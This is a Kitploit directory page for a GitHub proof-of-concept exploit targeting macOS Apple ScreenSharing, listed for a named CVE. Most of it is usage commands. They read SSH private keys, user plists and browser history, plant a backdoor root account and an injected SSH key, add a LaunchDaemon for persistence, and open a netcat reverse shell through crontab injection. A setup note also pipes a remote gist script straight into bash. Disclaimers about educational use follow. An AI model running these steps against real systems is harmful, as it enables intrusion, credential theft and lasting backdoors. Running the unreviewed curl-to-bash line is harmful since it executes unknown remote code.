Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-65400 — Proof-of-concept exploit for CVE-2026-65400 enabling authenticated file read/write, reverse shells, and persistence on macOS via Apple ScreenSharing. | Kitploit
Tools/GitHubGitHub/horkimhab/cve-2026-65400
Privilege EscalationPersistence MechanismsExploitationPost-ExploitationAuthenticationLearning & EducationRemote Access Tool
GitHubhorkimhab/cve-2026-65400

CVE-2026-65400

Proof-of-concept exploit for CVE-2026-65400 enabling authenticated file read/write, reverse shells, and persistence on macOS via Apple ScreenSharing.

View Repository
311023 days agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
Website

CVE-2026-65400

Donate

Support the maintenance of this project with PayPal or by scanning the QR code below.

paypal

QR code for donation

⚡ Simple Usage

Use this project only in safe and authorized environments such as:

  • Local virtual machines
  • Docker containers
  • Isolated lab setups
  • Authorized penetration testing environments

Example setup:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirments
pip install -r requirements.txt

Example usage:

root@kitploit:~
# Read a File from Target

# Read /etc/passwd and display it
python3 exploit.py read -u root 192.168.1.100 /etc/passwd

# Read and save to a local file
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -o passwd.txt

# Read a user's file
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Documents/secret.txt

# Write a File to Target

# Write a local file to target
python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt myfile.txt

# Write with specific permissions (0600 for crontab)
python3 exploit.py write -u root 192.168.1.100 /tmp/secret data.txt -m 0600

# Write from stdin
echo "hello world" | python3 exploit.py write -u root 192.168.1.100 /tmp/test.txt -

# Get a Reverse Shell (SIP Disabled Only)

# On your attacker machine, start a listener in another terminal
nc -nlvp 4444

# Run the exploit
python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444
# Where:
#   192.168.1.100 = target Mac IP
#   192.168.1.50  = your attacker IP
#   4444          = port for reverse shell

# Example 1: Reading System Files
# Read the shadow file (if accessible)
python3 exploit.py read -u root 192.168.1.100 /var/db/dslocal/nodes/Default/users/admin.plist -o admin.plist

# Read Safari history
python3 exploit.py read -u root 192.168.1.100 /Users/admin/Library/Safari/History.db -o history.db

# Read SSH keys (if they exist)
python3 exploit.py read -u root 192.168.1.100 /Users/admin/.ssh/id_rsa -o id_rsa

# Example 2: Writing Files

# Create a backdoor user
echo "backdoor:*:0:0:Backdoor:/var/root:/bin/bash" > backdoor.txt
python3 exploit.py write -u root 192.168.1.100 /private/etc/passwd backdoor.txt

# Inject SSH key
python3 exploit.py write -u root 192.168.1.100 /Users/admin/.ssh/authorized_keys ~/.ssh/id_rsa.pub

# Write a startup script
python3 exploit.py write -u root 192.168.1.100 /Library/LaunchDaemons/com.backdoor.plist backdoor.plist

# Example 3: SIP Detection

python3 exploit.py exec -u root 192.168.1.100 192.168.1.50 4444

# Output if SIP is enabled:
# [!] SIP is enabled - crontab injection will fail
# [!] Try using the read/write commands instead

# Output if SIP is disabled:
# [*] SIP is disabled - proceeding with RCE
# [+] Wrote shell script to /var/tmp/.r
# [+] Wrote crontab to /var/at/tabs/root
# [*] Reverse shell should connect to 192.168.1.50:4444 within 60 seconds

# Authentication Bypass Retry
# Increase retry count if it fails
python3 exploit.py read -u root 192.168.1.100 /etc/passwd -r 50

# Port Specification

python3 exploit.py read -u root 192.168.1.100 /etc/passwd -p 5901

Note:

  • clone from other project you must run curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y to clear nested dir .git
  • e.g: cve-2025-46822.sh, cve-2025-46822-lab.sh, ...

Credit or Reference

  • https://warez.sl0p.foo/apple-screensharing-rce/
  • https://blog.calif.io/p/no-country-for-old-passwords

📚 Educational Security Research Repository

A repository for learning, testing, and researching cybersecurity concepts in controlled environments.


⚠️ Security & Legal Disclaimer

Purpose

This repository is for educational and authorized security research only.

It is designed to help users learn about:

  • Security vulnerabilities
  • Sandbox and isolation concepts
  • Secure coding and defensive practices

Authorized Use Only

Use this repository only in environments where you have permission, such as:

  • Personal labs or virtual machines
  • Docker or isolated environments
  • Authorized penetration testing
  • Cybersecurity training or academic research

Unauthorized or illegal use is strictly prohibited.


No Liability

The author and contributors are not responsible for any damage, misuse, legal issues, or losses caused by this project.

By using this repository, you agree that:

  • You are responsible for your own actions
  • You will use it legally and ethically
  • The project is provided without warranty

Ethical Use

This project is intended for:

  • Defensive security research
  • Cybersecurity education
  • Vulnerability awareness
  • Secure system and software research

Please follow responsible disclosure practices and comply with all applicable laws.


Contact

For responsible disclosure or collaboration, contact the repository maintainer through GitHub.


Related Project

Explore the PoC CVE Collection for additional CVE proof-of-concept resources intended for authorized security research and education.

Download Tool